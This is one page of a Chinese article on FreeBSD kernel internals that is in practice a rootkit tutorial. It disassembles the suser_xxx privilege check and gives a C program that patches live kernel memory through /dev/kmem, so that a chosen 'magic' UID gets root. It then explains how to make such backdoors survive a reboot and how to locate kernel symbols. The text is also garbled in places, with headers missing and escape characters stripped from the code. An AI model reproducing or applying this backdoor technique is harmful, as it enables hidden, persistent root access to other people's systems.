Freebsd内核模块源码实现以及应用探秘

时间：2005-11-25 10:43:19 来源：作者：

nbsp;         return (EPERM);
        }
        if (!cred)
                cred = proc->p_ucred;
        if (cred->cr_uid != 0)            ///------------------------------------|
                return (EPERM);
        if (proc && proc->p_prison && !(flag & PRISON_ROOT))
                return (EPERM);
        if (proc)
                proc->p_acflag |= ASU;
        return (0);
}

除非你是一个assembler person ,请看一下，你可以注意到%eax存贮着cred ,%edx 存储着proc 结构，基本我们想改成这样

if ((cred->cr_uid != 0) && (cred->cr_uid != MAGIC_UID))
                return (EPERM);

现在我们要找一个地方去存放上面的代码，用printf的地址吧，printf的作用就是在suser_xxx在被错误调用时才有用，现在我们假设
没有人仔细看着它的屏幕；），看看汇编代码中，所有错误的返回都是这样把EPERM =1 放到 %eax 中c019d553: mov $0x1,%eax
看一下uid=!0的测试，跳转到c019d553.

c019d565:       83 78 04 00             cmpl   $0x0,0x4(%eax)
c019d569:       75 e8                   jne    c019d553      //75 表示 jne 向上跳转到偏移e8，e8是个负数-16

我们看一下我们将要放置新代码的printf处（10个字节）
c019d549:       68 90 df 36 c0          push   $0xc036df90
c019d54e:       e8 5d db 00 00          call   c01ab0b0
现在我们需要修改跳转地址 75 表示 jne 向上跳转到偏移e8，e8是个负数-16

现在我们就要修改printf地址的代码并添加我们自己的check了（cred->cr_uid != MAGIC_UID）首先我们用 jmp 0x7(来跳过这个
检查）当它被“正常调用时“不出错，就是在(!cred && !proc)的测试中，然后添加我们的检验代码
jmp 0x07                        eb 07                /* 跳过检查 */
cmpl $magic,0x4(%eax)         83 78 04 magic       /* 检察MAGIC_UID */
je 0x39                         74 39                /* 跳到结束 */
nop                           90                   /* 用来填充的字节 */
nop                           90

现在修改 c019d569 地址出的 75 e8 为 75 e0（后退8个字节）实际跳转到了cmpl $magic,0x4(%eax) 这里来执行
我们把它整合到一块，我的特定的MAGIC_UID=100；
#include
#include
#include
#include
#include

#define MAGIC_ADDR      0xc019d549
#define MAKE_OR_ADDR    0xc019d569

unsigned char magic[] = "xebx07"      /* jmp 06 */
                        "x83x78x04x00"      /* cmpl $magic,0x4(%eax) */
                        "x74x39"      /* je to end */
                        "x90x90"      /* filling nop */
;

unsigned char makeor[] = "x75xe0";    /* jne e0 */

int
main(int argc, char **argv) {

        char errbuf[_POSIX2_LINE_MAX];
        long diff;
        kvm_t *kd;
        u_int32_t magic_addr = MAGIC_ADDR;
        u_int32_t makeor_addr = MAKE_OR_ADDR;

        kd = kvm_openfiles(NULL,NULL,NULL,O_RDWR,errbuf);
        if(kd == NULL) {
                fprintf(stderr,"ERROR: %sn",errbuf);
                exit(-1);
        }

        if(kvm_write(kd,MAGIC_ADDR,magic,sizeof(magic)-1) < 0) {
                fprintf(stderr,"ERROR: %sn",kvm_geterr(kd));
                exit(-1);
        }

        if(kvm_write(kd,MAKE_OR_ADDR,makeor,sizeof(makeor)-1) < 0) {
                fprintf(stderr,"ERROR: %sn",kvm_geterr(kd));
                exit(-1);
        }

        if(kvm_close(kd) < 0) {
                fprintf(stderr,"ERROR: %sn",kvm_geterr(kd));
                exit(-1);
        }

        exit(0);
}
在direct/fix_suser_xxx.c 可能你会见到轻微的改动，它要求uid<256

现在你可以copy /sbin/ping 到你的目录下测试一下：）

5.越过重启

显然当重启后我们的模块奖不能在使用，所以我们可以把我们的模块启动sh脚本放在/usr/local/etc/rc.d/ （这个目录可以改变通过
rc.conf：）,其实放在loader.conf也不错）当然必须安全级别调整之前执行。
如果你通过上面的/dev/kmem直接改变了内核的代码,你可以把这些改变直接写进/kernel(hu,hu),我没有查elf的相关文档，但是看上
去重定向地址应该是/kernel内的偏移+0xc0100000,在你写你的内核时，请测试先。在direct/fix_suser_xxx_kernel.c 有个同样
的例子。

6. 实战

在先前的例子中，所有的符号地址都来自/dev/kmem,但是它确切的出处在哪里呢？它在内核中经常变化。这些符号存储在elf hash 表
里面，每个连入内核的文件（object）都有它自己的符号表，在exp/symtable.c 有个例子它在linker_files队列中查找第一个
命名为kernel的条目，函数名被hash了，并被重新获得，符号找到之后它的value就可以改变了�

6/7 |‹ ‹‹ 4 5 6 7 ›› ›|

来顶一下

返回首页

相关文章

无相关信息

栏目更新

栏目热门